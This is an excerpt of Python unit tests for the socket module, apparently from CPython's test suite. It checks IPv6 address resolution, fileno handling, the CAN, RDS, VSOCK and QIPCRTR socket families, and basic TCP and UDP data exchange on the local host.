def test_getaddrinfo_ipv6_basic(self):
    """getaddrinfo() normalizes IPv6 hex digits to lowercase."""
    ((*_, sockaddr),) = socket.getaddrinfo(
        'ff02::1de:c0:face:8D',  # Note capital letter `D`.
        1234, socket.AF_INET6,
        socket.SOCK_DGRAM,
        socket.IPPROTO_UDP
    )
    self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
    """A symbolic %interface scope maps to the interface index in the sockaddr."""
    # Just pick up any network interface (Linux, Mac OS X)
    (ifindex, test_interface) = socket.if_nameindex()[0]
    ((*_, sockaddr),) = socket.getaddrinfo(
        'ff02::1de:c0:face:8D%' + test_interface,
        1234, socket.AF_INET6,
        socket.SOCK_DGRAM,
        socket.IPPROTO_UDP
    )
    # Note missing interface name part in IPv6 address
    self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
    sys.platform == 'win32',
    'Numeric scope id does not work or undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
    """A numeric %N scope id is carried through to the sockaddr's scope field."""
    # Also works on Linux and Mac OS X, but is not documented (?)
    # Windows, Linux and Max OS X allow nonexistent interface numbers here.
    ifindex = 42
    ((*_, sockaddr),) = socket.getaddrinfo(
        'ff02::1de:c0:face:8D%' + str(ifindex),
        1234, socket.AF_INET6,
        socket.SOCK_DGRAM,
        socket.IPPROTO_UDP
    )
    # Note missing interface name part in IPv6 address
    self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
    """getnameinfo() appends the symbolic %interface scope to the address."""
    # Just pick up any network interface.
    (ifindex, test_interface) = socket.if_nameindex()[0]
    sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex)  # Note capital letter `D`.
    nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
    self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless( sys.platform == 'win32',
    'Numeric scope id does not work or undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
    """getnameinfo() appends a numeric %N scope id to the address."""
    # Also works on Linux (undocumented), but does not work on Mac OS X
    # Windows and Linux allow nonexistent interface numbers here.
    ifindex = 42
    sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex)  # Note capital letter `D`.
    nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
    self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
    """Socket family and type attributes stringify as enum members."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as conn:
        self.assertEqual(str(conn.family), 'AddressFamily.AF_INET')
        self.assertEqual(str(conn.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
    """s.type stays SOCK_STREAM no matter how blocking/timeout are toggled."""
    nonblock_bit = getattr(socket, 'SOCK_NONBLOCK', 0)
    cloexec_bit = getattr(socket, 'SOCK_CLOEXEC', 0)
    combined = socket.SOCK_STREAM | nonblock_bit | cloexec_bit
    with socket.socket(socket.AF_INET, combined) as s:
        # Check type before and after each blocking-mode mutation.
        for mutate in (lambda: s.settimeout(1),
                       lambda: s.settimeout(0),
                       lambda: s.setblocking(True),
                       lambda: s.setblocking(False)):
            self.assertEqual(s.type, socket.SOCK_STREAM)
            mutate()
        self.assertEqual(s.type, socket.SOCK_STREAM)
def test_unknown_socket_family_repr(self):
    """family/type/proto numbers outside the known enums are kept as ints."""
    # Test that when created with a family that's not one of the known
    # AF_*/SOCK_* constants, socket.family just returns the number.
    #
    # To do this we fool socket.socket into believing it already has an
    # open fd because on this path it doesn't actually verify the family and
    # type and populates the socket object.
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    fd = sock.detach()
    unknown_family = max(socket.AddressFamily.__members__.values()) + 1
    # SOCK_NONBLOCK / SOCK_CLOEXEC are flag bits, not kinds, so skip them
    # when picking a value above every real socket kind.
    unknown_type = max(
        kind
        for name, kind in socket.SocketKind.__members__.items()
        if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
    ) + 1
    with socket.socket(
            family=unknown_family, type=unknown_type, proto=23,
            fileno=fd) as s:
        self.assertEqual(s.family, unknown_family)
        self.assertEqual(s.type, unknown_type)
        # some OS like macOS ignore proto
        self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
    """_sendfile_use_sendfile() fails cleanly on bad file descriptors."""
    class File:
        # Minimal stand-in exposing only fileno().
        def __init__(self, fd):
            self.fd = fd
        def fileno(self):
            return self.fd
    with socket.socket() as sock:
        # A stale (already-closed) fd must trigger the sendfile fallback.
        fd = os.open(os.curdir, os.O_RDONLY)
        os.close(fd)
        with self.assertRaises(socket._GiveupOnSendfile):
            sock._sendfile_use_sendfile(File(fd))
        with self.assertRaises(OverflowError):
            sock._sendfile_use_sendfile(File(2**1000))
        with self.assertRaises(TypeError):
            sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
    """Helper: check socket.socket(fileno=...) clones *s* faithfully.

    Verifies family/type on the original, rebuilds a socket from its
    fd, and checks the clone reports the same family, type and fd.
    """
    self.assertEqual(s.family, family)
    self.assertEqual(s.type, stype)

    fd = s.fileno()
    s2 = socket.socket(fileno=fd)
    self.addCleanup(s2.close)
    # detach old fd to avoid double close
    s.detach()
    self.assertEqual(s2.family, family)
    self.assertEqual(s2.type, stype)
    self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
    """socket.socket(fileno=...) must work for every available family.

    Exercises AF_INET stream and datagram sockets, plus AF_INET6 and
    AF_UNIX where the platform supports them.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    self.addCleanup(s.close)
    s.bind((support.HOST, 0))
    self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)

    if hasattr(socket, "SOCK_DGRAM"):
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.addCleanup(s.close)
        s.bind((support.HOST, 0))
        self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)

    if support.IPV6_ENABLED:
        s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
        self.addCleanup(s.close)
        s.bind((support.HOSTv6, 0, 0, 0))
        self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)

    if hasattr(socket, "AF_UNIX"):
        tmpdir = tempfile.mkdtemp()
        self.addCleanup(shutil.rmtree, tmpdir)
        s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.addCleanup(s.close)
        try:
            s.bind(os.path.join(tmpdir, 'socket'))
        except PermissionError:
            # Binding a unix socket may be forbidden; skip that branch.
            pass
        else:
            self._test_socket_fileno(s, socket.AF_UNIX,
                                     socket.SOCK_STREAM)
def test_socket_fileno_rejects_float(self):
    """A float fileno argument must be rejected with TypeError."""
    self.assertRaisesRegex(
        TypeError, "integer argument expected",
        socket.socket, socket.AF_INET, socket.SOCK_STREAM, fileno=42.5)
def test_socket_fileno_rejects_other_types(self):
    """A non-numeric fileno argument must be rejected with TypeError."""
    self.assertRaisesRegex(
        TypeError, "integer is required",
        socket.socket, socket.AF_INET, socket.SOCK_STREAM, fileno="foo")
def test_socket_fileno_rejects_invalid_socket(self):
    """fileno=-1 must be rejected as a negative file descriptor."""
    self.assertRaisesRegex(
        ValueError, "negative file descriptor",
        socket.socket, socket.AF_INET, socket.SOCK_STREAM, fileno=-1)
@unittest.skipIf(os.name == "nt", "Windows disallows -1 only")
def test_socket_fileno_rejects_negative(self):
    """Any other negative fileno must also raise ValueError (non-Windows)."""
    self.assertRaisesRegex(
        ValueError, "negative file descriptor",
        socket.socket, socket.AF_INET, socket.SOCK_STREAM, fileno=-42)
def test_socket_fileno_requires_valid_fd(self):
    """An fd that is not open must fail with EBADF (WSAENOTSOCK on Windows)."""
    WSAENOTSOCK = 10038
    # Without explicit family/type.
    with self.assertRaises(OSError) as cm:
        socket.socket(fileno=support.make_bad_fd())
    self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))

    # With explicit family/type.
    with self.assertRaises(OSError) as cm:
        socket.socket(
            socket.AF_INET,
            socket.SOCK_STREAM,
            fileno=support.make_bad_fd())
    self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
def test_socket_fileno_requires_socket_fd(self):
    """An open fd that is not a socket must be rejected."""
    with tempfile.NamedTemporaryFile() as afile:
        # errno is not checked here; only the fully-specified call
        # below pins it to ENOTSOCK.
        with self.assertRaises(OSError):
            socket.socket(fileno=afile.fileno())

        with self.assertRaises(OSError) as cm:
            socket.socket(
                socket.AF_INET,
                socket.SOCK_STREAM,
                fileno=afile.fileno())
        self.assertEqual(cm.exception.errno, errno.ENOTSOCK)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
    """Single-socket sanity checks for the SocketCAN (AF_CAN) family."""

    def testCrucialConstants(self):
        # Bare attribute access is the test: AttributeError means missing.
        socket.AF_CAN
        socket.PF_CAN
        socket.CAN_RAW

    @unittest.skipUnless(hasattr(socket, "CAN_BCM"),
                         'socket.CAN_BCM required for this test.')
    def testBCMConstants(self):
        socket.CAN_BCM

        # opcodes
        socket.CAN_BCM_TX_SETUP     # create (cyclic) transmission task
        socket.CAN_BCM_TX_DELETE    # remove (cyclic) transmission task
        socket.CAN_BCM_TX_READ      # read properties of (cyclic) transmission task
        socket.CAN_BCM_TX_SEND      # send one CAN frame
        socket.CAN_BCM_RX_SETUP     # create RX content filter subscription
        socket.CAN_BCM_RX_DELETE    # remove RX content filter subscription
        socket.CAN_BCM_RX_READ      # read properties of RX content filter subscription
        socket.CAN_BCM_TX_STATUS    # reply to TX_READ request
        socket.CAN_BCM_TX_EXPIRED   # notification on performed transmissions (count=0)
        socket.CAN_BCM_RX_STATUS    # reply to RX_READ request
        socket.CAN_BCM_RX_TIMEOUT   # cyclic message is absent
        socket.CAN_BCM_RX_CHANGED   # updated CAN frame (detected content change)

        # flags
        socket.CAN_BCM_SETTIMER
        socket.CAN_BCM_STARTTIMER
        socket.CAN_BCM_TX_COUNTEVT
        socket.CAN_BCM_TX_ANNOUNCE
        socket.CAN_BCM_TX_CP_CAN_ID
        socket.CAN_BCM_RX_FILTER_ID
        socket.CAN_BCM_RX_CHECK_DLC
        socket.CAN_BCM_RX_NO_AUTOTIMER
        socket.CAN_BCM_RX_ANNOUNCE_RESUME
        socket.CAN_BCM_TX_RESET_MULTI_IDX
        socket.CAN_BCM_RX_RTR_FRAME

    def testCreateSocket(self):
        # Creation alone must succeed; the context manager closes the fd.
        with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
            pass

    @unittest.skipUnless(hasattr(socket, "CAN_BCM"),
                         'socket.CAN_BCM required for this test.')
    def testCreateBCMSocket(self):
        with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
            pass

    def testBindAny(self):
        # An empty interface name binds to all CAN interfaces.
        with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
            address = ('', )
            s.bind(address)
            self.assertEqual(s.getsockname(), address)

    def testTooLongInterfaceName(self):
        # most systems limit IFNAMSIZ to 16, take 1024 to be sure
        with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
            self.assertRaisesRegex(OSError, 'interface name too long',
                                   s.bind, ('x' * 1024,))

    @unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
                         'socket.CAN_RAW_LOOPBACK required for this test.')
    def testLoopback(self):
        # The loopback option must round-trip through set/getsockopt.
        with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
            for loopback in (0, 1):
                s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
                             loopback)
                self.assertEqual(loopback,
                    s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))

    @unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
                         'socket.CAN_RAW_FILTER required for this test.')
    def testFilter(self):
        # A filter is a packed (can_id, can_mask) pair; it must round-trip
        # and bytearray input must be accepted as well.
        can_id, can_mask = 0x200, 0x700
        can_filter = struct.pack("=II", can_id, can_mask)
        with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
            s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
            self.assertEqual(can_filter,
                    s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
            s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
    """Threaded frame exchange over CAN_RAW and CAN_BCM sockets.

    Each testFoo() runs against the server socket while its _testFoo()
    twin runs in the client thread (pairing provided by
    ThreadedCANSocketTest).
    """

    def __init__(self, methodName='runTest'):
        ThreadedCANSocketTest.__init__(self, methodName=methodName)

    @classmethod
    def build_can_frame(cls, can_id, data):
        """Build a CAN frame."""
        can_dlc = len(data)
        # The payload field is fixed-width: pad with NULs and record the
        # real length in can_dlc.
        data = data.ljust(8, b'\x00')
        return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)

    @classmethod
    def dissect_can_frame(cls, frame):
        """Dissect a CAN frame."""
        can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
        # Trim the padding back off using the recorded length.
        return (can_id, can_dlc, data[:can_dlc])

    def testSendFrame(self):
        cf, addr = self.s.recvfrom(self.bufsize)
        self.assertEqual(self.cf, cf)
        # The sender address carries the CAN interface name.
        self.assertEqual(addr[0], self.interface)

    def _testSendFrame(self):
        self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
        self.cli.send(self.cf)

    def testSendMaxFrame(self):
        cf, addr = self.s.recvfrom(self.bufsize)
        self.assertEqual(self.cf, cf)

    def _testSendMaxFrame(self):
        # 8 bytes: the largest payload build_can_frame() pads to.
        self.cf = self.build_can_frame(0x00, b'\x07' * 8)
        self.cli.send(self.cf)

    def testSendMultiFrames(self):
        # Frames must arrive separately and in order.
        cf, addr = self.s.recvfrom(self.bufsize)
        self.assertEqual(self.cf1, cf)

        cf, addr = self.s.recvfrom(self.bufsize)
        self.assertEqual(self.cf2, cf)

    def _testSendMultiFrames(self):
        self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
        self.cli.send(self.cf1)

        self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
        self.cli.send(self.cf2)

    @unittest.skipUnless(hasattr(socket, "CAN_BCM"),
                         'socket.CAN_BCM required for this test.')
    def _testBCM(self):
        # Client side: receive the frame testBCM() pushed through the
        # broadcast manager and check it survived the round trip.
        cf, addr = self.cli.recvfrom(self.bufsize)
        self.assertEqual(self.cf, cf)
        can_id, can_dlc, data = self.dissect_can_frame(cf)
        self.assertEqual(self.can_id, can_id)
        self.assertEqual(self.data, data)

    @unittest.skipUnless(hasattr(socket, "CAN_BCM"),
                         'socket.CAN_BCM required for this test.')
    def testBCM(self):
        bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
        self.addCleanup(bcm.close)
        bcm.connect((self.interface,))
        self.can_id = 0x123
        self.data = bytes([0xc0, 0xff, 0xee])
        self.cf = self.build_can_frame(self.can_id, self.data)
        # Broadcast-manager message: a command header (bcm_cmd_msg_fmt)
        # followed by one CAN frame, sent with the TX_SEND opcode.
        opcode = socket.CAN_BCM_TX_SEND
        flags = 0
        count = 0
        ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
        bcm_can_id = 0x0222
        nframes = 1
        assert len(self.cf) == 16
        header = struct.pack(self.bcm_cmd_msg_fmt,
                             opcode,
                             flags,
                             count,
                             ival1_seconds,
                             ival1_usec,
                             ival2_seconds,
                             ival2_usec,
                             bcm_can_id,
                             nframes,
                             )
        header_plus_frame = header + self.cf
        bytes_sent = bcm.send(header_plus_frame)
        self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
    """Basic checks for CAN ISO-TP sockets (no traffic is exchanged)."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Virtual CAN interface the bind test expects; testBind() skips
        # if it does not exist.
        self.interface = "vcan0"

    def testCrucialConstants(self):
        socket.AF_CAN
        socket.PF_CAN
        socket.CAN_ISOTP
        socket.SOCK_DGRAM

    def testCreateSocket(self):
        # Plain CAN_RAW creation must work on an ISOTP-capable system too.
        with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
            pass

    @unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
                         'socket.CAN_ISOTP required for this test.')
    def testCreateISOTPSocket(self):
        with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
            pass

    def testTooLongInterfaceName(self):
        # most systems limit IFNAMSIZ to 16, take 1024 to be sure
        with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
            with self.assertRaisesRegex(OSError, 'interface name too long'):
                s.bind(('x' * 1024, 1, 2))

    def testBind(self):
        try:
            with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
                # Bind address: interface name plus two CAN ids.
                addr = self.interface, 0x123, 0x456
                s.bind(addr)
                self.assertEqual(s.getsockname(), addr)
        except OSError as e:
            if e.errno == errno.ENODEV:
                # The vcan0 interface is optional; skip rather than fail.
                self.skipTest('network interface `%s` does not exist' %
                              self.interface)
            else:
                raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
    """Single-socket sanity checks for Reliable Datagram Sockets (RDS)."""

    def testCrucialConstants(self):
        socket.AF_RDS
        socket.PF_RDS

    def testCreateSocket(self):
        with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
            pass

    def testSocketBufferSize(self):
        # Setting the send/receive buffer sizes must simply not raise.
        bufsize = 16384
        with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
            s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
            s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
    """Client/server datagram exchange over RDS sockets.

    Each testFoo() runs in the server thread and its _testFoo() twin
    runs in the client thread (pairing from ThreadedRDSSocketTest).
    """

    def __init__(self, methodName='runTest'):
        ThreadedRDSSocketTest.__init__(self, methodName=methodName)

    def setUp(self):
        super().setUp()
        self.evt = threading.Event()

    def testSendAndRecv(self):
        data, addr = self.serv.recvfrom(self.bufsize)
        self.assertEqual(self.data, data)
        # The reported sender address must match the client's address.
        self.assertEqual(self.cli_addr, addr)

    def _testSendAndRecv(self):
        self.data = b'spam'
        self.cli.sendto(self.data, 0, (HOST, self.port))

    def testPeek(self):
        # MSG_PEEK must leave the datagram queued for the next recvfrom().
        data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
        self.assertEqual(self.data, data)
        data, addr = self.serv.recvfrom(self.bufsize)
        self.assertEqual(self.data, data)

    def _testPeek(self):
        self.data = b'spam'
        self.cli.sendto(self.data, 0, (HOST, self.port))

    @requireAttrs(socket.socket, 'recvmsg')
    def testSendAndRecvMsg(self):
        data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
        self.assertEqual(self.data, data)

    @requireAttrs(socket.socket, 'sendmsg')
    def _testSendAndRecvMsg(self):
        self.data = b'hello ' * 10
        self.cli.sendmsg([self.data], (), 0, (HOST, self.port))

    def testSendAndRecvMulti(self):
        # Two datagrams must arrive separately and in order.
        data, addr = self.serv.recvfrom(self.bufsize)
        self.assertEqual(self.data1, data)

        data, addr = self.serv.recvfrom(self.bufsize)
        self.assertEqual(self.data2, data)

    def _testSendAndRecvMulti(self):
        self.data1 = b'bacon'
        self.cli.sendto(self.data1, 0, (HOST, self.port))

        self.data2 = b'egg'
        self.cli.sendto(self.data2, 0, (HOST, self.port))

    def testSelect(self):
        # The server socket must become readable once a datagram queues.
        r, w, x = select.select([self.serv], [], [], 3.0)
        self.assertIn(self.serv, r)
        data, addr = self.serv.recvfrom(self.bufsize)
        self.assertEqual(self.data, data)

    def _testSelect(self):
        self.data = b'select'
        self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_QIPCRTR,
          'QIPCRTR sockets required for this test.')
class BasicQIPCRTRTest(unittest.TestCase):
    """Basic checks for Qualcomm IPC router (AF_QIPCRTR) sockets."""

    def testCrucialConstants(self):
        socket.AF_QIPCRTR

    def testCreateSocket(self):
        with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
            pass

    def testUnbound(self):
        # A fresh socket reports port 0 (not yet bound).
        with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
            self.assertEqual(s.getsockname()[1], 0)

    def testBindSock(self):
        with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
            support.bind_port(s, host=s.getsockname()[0])
            self.assertNotEqual(s.getsockname()[1], 0)

    def testInvalidBindSock(self):
        # A negative host value must be rejected.
        with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
            self.assertRaises(OSError, support.bind_port, s, host=-2)

    def testAutoBindSock(self):
        # connect() triggers an automatic bind to a non-zero port.
        with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
            s.connect((123, 123))
            self.assertNotEqual(s.getsockname()[1], 0)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
          'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
    """Basic checks for VM sockets (AF_VSOCK)."""

    def testCrucialConstants(self):
        socket.AF_VSOCK

    def testVSOCKConstants(self):
        socket.SO_VM_SOCKETS_BUFFER_SIZE
        socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
        socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
        socket.VMADDR_CID_ANY
        socket.VMADDR_PORT_ANY
        socket.VMADDR_CID_HOST
        socket.VM_SOCKETS_INVALID_VERSION
        socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID

    def testCreateSocket(self):
        with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
            pass

    def testSocketBufferSize(self):
        # Doubling each buffer-size option must round-trip via getsockopt.
        with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
            orig_max = s.getsockopt(socket.AF_VSOCK,
                                    socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
            orig = s.getsockopt(socket.AF_VSOCK,
                                socket.SO_VM_SOCKETS_BUFFER_SIZE)
            orig_min = s.getsockopt(socket.AF_VSOCK,
                                    socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)

            s.setsockopt(socket.AF_VSOCK,
                         socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
            s.setsockopt(socket.AF_VSOCK,
                         socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
            s.setsockopt(socket.AF_VSOCK,
                         socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)

            self.assertEqual(orig_max * 2,
                             s.getsockopt(socket.AF_VSOCK,
                             socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
            self.assertEqual(orig * 2,
                             s.getsockopt(socket.AF_VSOCK,
                             socket.SO_VM_SOCKETS_BUFFER_SIZE))
            self.assertEqual(orig_min * 2,
                             s.getsockopt(socket.AF_VSOCK,
                             socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
class BasicTCPTest(SocketConnectedTest):
    """Data-exchange tests over a connected TCP pair.

    testFoo() runs on the server's accepted connection (cli_conn) while
    its _testFoo() twin runs in the client thread using serv_conn; the
    sockets and thread pairing come from SocketConnectedTest.
    """

    def __init__(self, methodName='runTest'):
        SocketConnectedTest.__init__(self, methodName=methodName)

    def testRecv(self):
        # Testing large receive over TCP
        msg = self.cli_conn.recv(1024)
        self.assertEqual(msg, MSG)

    def _testRecv(self):
        self.serv_conn.send(MSG)

    def testOverFlowRecv(self):
        # Testing receive in chunks over TCP
        seg1 = self.cli_conn.recv(len(MSG) - 3)
        seg2 = self.cli_conn.recv(1024)
        msg = seg1 + seg2
        self.assertEqual(msg, MSG)

    def _testOverFlowRecv(self):
        self.serv_conn.send(MSG)

    def testRecvFrom(self):
        # Testing large recvfrom() over TCP
        msg, addr = self.cli_conn.recvfrom(1024)
        self.assertEqual(msg, MSG)

    def _testRecvFrom(self):
        self.serv_conn.send(MSG)

    def testOverFlowRecvFrom(self):
        # Testing recvfrom() in chunks over TCP
        seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
        seg2, addr = self.cli_conn.recvfrom(1024)
        msg = seg1 + seg2
        self.assertEqual(msg, MSG)

    def _testOverFlowRecvFrom(self):
        self.serv_conn.send(MSG)

    def testSendAll(self):
        # Testing sendall() with a 2048 byte string over TCP
        msg = b''
        while 1:
            read = self.cli_conn.recv(1024)
            if not read:
                break
            msg += read
        self.assertEqual(msg, b'f' * 2048)

    def _testSendAll(self):
        big_chunk = b'f' * 2048
        self.serv_conn.sendall(big_chunk)

    def testFromFd(self):
        # Testing fromfd()
        fd = self.cli_conn.fileno()
        sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
        self.addCleanup(sock.close)
        self.assertIsInstance(sock, socket.socket)
        msg = sock.recv(1024)
        self.assertEqual(msg, MSG)

    def _testFromFd(self):
        self.serv_conn.send(MSG)

    def testDup(self):
        # Testing dup()
        sock = self.cli_conn.dup()
        self.addCleanup(sock.close)
        msg = sock.recv(1024)
        self.assertEqual(msg, MSG)

    def _testDup(self):
        self.serv_conn.send(MSG)

    def testShutdown(self):
        # Testing shutdown()
        msg = self.cli_conn.recv(1024)
        self.assertEqual(msg, MSG)
        # wait for _testShutdown to finish: on OS X, when the server
        # closes the connection the client also becomes disconnected,
        # and the client's shutdown call will fail. (Issue #4397.)
        self.done.wait()

    def _testShutdown(self):
        self.serv_conn.send(MSG)
        self.serv_conn.shutdown(2)

    # Reuse testShutdown as the server half for the CPython-only
    # overflow variant: the framework pairs it by name with
    # _testShutdown_overflow below.
    testShutdown_overflow = support.cpython_only(testShutdown)

    @support.cpython_only
    def _testShutdown_overflow(self):
        import _testcapi
        self.serv_conn.send(MSG)
        # Issue 15989
        self.assertRaises(OverflowError, self.serv_conn.shutdown,
                          _testcapi.INT_MAX + 1)
        self.assertRaises(OverflowError, self.serv_conn.shutdown,
                          2 + (_testcapi.UINT_MAX + 1))
        self.serv_conn.shutdown(2)

    def testDetach(self):
        # Testing detach()
        fileno = self.cli_conn.fileno()
        f = self.cli_conn.detach()
        self.assertEqual(f, fileno)
        # cli_conn cannot be used anymore...
        self.assertTrue(self.cli_conn._closed)
        self.assertRaises(OSError, self.cli_conn.recv, 1024)
        self.cli_conn.close()
        # ...but we can create another socket using the (still open)
        # file descriptor
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
        self.addCleanup(sock.close)
        msg = sock.recv(1024)
        self.assertEqual(msg, MSG)

    def _testDetach(self):
        self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
    """Datagram exchange over UDP: client thread sends, server checks."""

    def __init__(self, methodName='runTest'):
        ThreadedUDPSocketTest.__init__(self, methodName=methodName)

    def testSendtoAndRecv(self):
        # Testing sendto() and Recv() over UDP
        msg = self.serv.recv(len(MSG))
        self.assertEqual(msg, MSG)

    def _testSendtoAndRecv(self):
        self.cli.sendto(MSG, 0, (HOST, self.port))

    def testRecvFrom(self):
        # Testing recvfrom() over UDP
        msg, addr = self.serv.recvfrom(len(MSG))
        self.assertEqual(msg, MSG)

    def _testRecvFrom(self):
        self.cli.sendto(MSG, 0, (HOST, self.port))

    def testRecvFromNegative(self):
        # Negative lengths passed to recvfrom should give ValueError.
        self.assertRaises(ValueError, self.serv.recvfrom, -1)

    def _testRecvFromNegative(self):
        self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
